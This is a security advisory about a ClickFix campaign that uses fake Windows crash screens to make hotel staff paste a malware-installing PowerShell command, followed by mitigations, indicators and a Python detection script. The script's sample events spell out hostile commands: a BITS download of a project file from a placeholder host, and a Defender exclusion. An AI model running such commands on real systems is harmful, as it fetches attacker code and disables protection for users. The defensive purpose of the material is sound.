


Perceptive Security
SOC/SIEM Consultancy

ClickFix attack uses fake Windows BSOD screens to push malware
Published:
5 January 2026 at 21:16:35
Alert date:
5 January 2026 at 22:02:21
Source:
bleepingcomputer.com
Operating Systems, Ransomware & Malware, Email & Messaging
A new ClickFix social engineering campaign is targeting the hospitality sector in Europe. It uses convincing fake Windows Blue Screen of Death (BSOD) screens to trick users into manually compiling and executing malware on their own systems. This marks an evolution of social engineering tactics: rather than relying on a phishing page alone, the attackers use visual deception that mimics a system failure, so victims believe they are following legitimate recovery instructions when they are in fact running attacker-supplied commands. The narrow focus on hospitality businesses suggests a deliberately targeted campaign.
Technical details
The ClickFix campaign targets the hospitality sector in Europe. The attack begins with phishing emails impersonating Booking.com reservation cancellations, which lead victims to the fake website low-house[.]com. Malicious JavaScript on that page first displays a fake loading error, then switches the browser to full-screen mode and shows a fake BSOD instructing the user to open the Windows Run dialog and press CTRL+V; the page has already copied a malicious PowerShell command to the clipboard. That command downloads a malicious .NET project (v.proj) and compiles it with the legitimate MSBuild.exe, adds Windows Defender exclusions, establishes persistence through a .url file in the Startup folder, and deploys the DCRAT remote access Trojan. The malware is injected into the aspnet_compiler.exe process using process hollowing and supports remote desktop, keylogging, a reverse shell, and cryptocurrency mining.
Mitigation steps:
Train staff to recognize what a legitimate BSOD looks like: it only displays error codes and never offers recovery instructions.
Implement email security controls to detect phishing that impersonates booking platforms.
Monitor for suspicious PowerShell execution and MSBuild.exe usage.
Watch for unexpected additions to the Windows Defender exclusion list.
Monitor BITS usage for suspicious downloads.
Check the Startup folder for unauthorized .url files.
Implement process monitoring to detect process hollowing against legitimate executables such as aspnet_compiler.exe.
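The monitoring steps above map onto a handful of process-creation and file-creation checks. As an added example (not from the Perceptive or BleepingComputer write-up), the Python below runs those heuristics over constructed Sysmon-style events (event id 1 = process create, id 11 = file create); the paths, host name and event field names are assumptions chosen for illustration, not indicators from the campaign.

```python
import re

STARTUP = "\\microsoft\\windows\\start menu\\programs\\startup\\"  # per-user Startup folder

def _ends(path, name):  # does an image/parent path end with this executable name?
    return path.lower().endswith("\\" + name)

# (rule name, Sysmon event id, predicate). Id 1 = process create, 11 = file create.
RULES = [
    # Run dialog (explorer.exe) launching PowerShell: where the pasted command lands
    ("run_dialog_powershell", 1, lambda e: _ends(e["parent"], "explorer.exe")
        and _ends(e["image"], "powershell.exe")),
    # Defender exclusion added from the command line
    ("defender_exclusion", 1, lambda e: re.search(r"add-mppreference.*-exclusion", e["cmd"], re.I)),
    # BITS used as a downloader
    ("bits_download", 1, lambda e: re.search(r"start-bitstransfer|bitsadmin", e["cmd"], re.I)),
    # MSBuild compiling a .proj from a user-writable directory
    ("msbuild_user_proj", 1, lambda e: _ends(e["image"], "msbuild.exe")
        and re.search(r"\\(appdata|temp|users\\public)\\.*\.proj", e["cmd"], re.I)),
    # aspnet_compiler.exe started by MSBuild: the hollowing target in this campaign
    ("aspnet_compiler_child", 1, lambda e: _ends(e["image"], "aspnet_compiler.exe")
        and _ends(e["parent"], "msbuild.exe")),
    # .url shortcut dropped into the Startup folder for persistence
    ("startup_url", 11, lambda e: STARTUP in e["target"].lower() and e["target"].lower().endswith(".url")),
]

def scan(events):
    """Return (rule_name, event_index) for each event that matches a rule."""
    return [(name, i) for i, e in enumerate(events)
            for name, eid, pred in RULES if e["id"] == eid and pred(e)]

# Constructed sample telemetry modelled on the described chain; paths and host are placeholders.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
NET = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\"
SAMPLE_EVENTS = [
    {"id": 1, "image": PS, "parent": "C:\\Windows\\explorer.exe",
     "cmd": "powershell -w hidden Start-BitsTransfer -Source http://example.invalid/v.proj "
            "-Destination C:\\Users\\u\\AppData\\Local\\Temp\\v.proj"},
    {"id": 1, "image": PS, "parent": "C:\\Windows\\explorer.exe",
     "cmd": "powershell Add-MpPreference -ExclusionPath C:\\Users\\u\\AppData"},
    {"id": 1, "image": NET + "MSBuild.exe", "parent": PS,
     "cmd": "MSBuild.exe C:\\Users\\u\\AppData\\Local\\Temp\\v.proj"},
    {"id": 1, "image": NET + "aspnet_compiler.exe", "parent": NET + "MSBuild.exe",
     "cmd": "aspnet_compiler.exe"},
    {"id": 11, "target": "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\upd.url"},
    {"id": 1, "image": "C:\\Windows\\System32\\notepad.exe", "parent": "C:\\Windows\\explorer.exe",
     "cmd": "notepad.exe"},  # benign control: no rule should fire
]
```

Each rule alone is noisy in a developer environment (MSBuild and PowerShell are legitimate there); the value is in several of them firing on the same host within minutes, so feed the hits into a correlation rule rather than alerting on any single one.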
Affected products:
Windows operating system
Windows Defender
MSBuild.exe
aspnet_compiler.exe
Booking.com (impersonated)
IOCs:
low-house[.]com
staxs.exe
DCRAT remote access Trojan
Malicious .NET project (v.proj)
Fake BSOD screens in browser full-screen mode
PowerShell commands copied to the clipboard
Background Intelligent Transfer Service (BITS) usage
.url files in the Startup folder
This article was created with the assistance of AI technology by Perceptive.
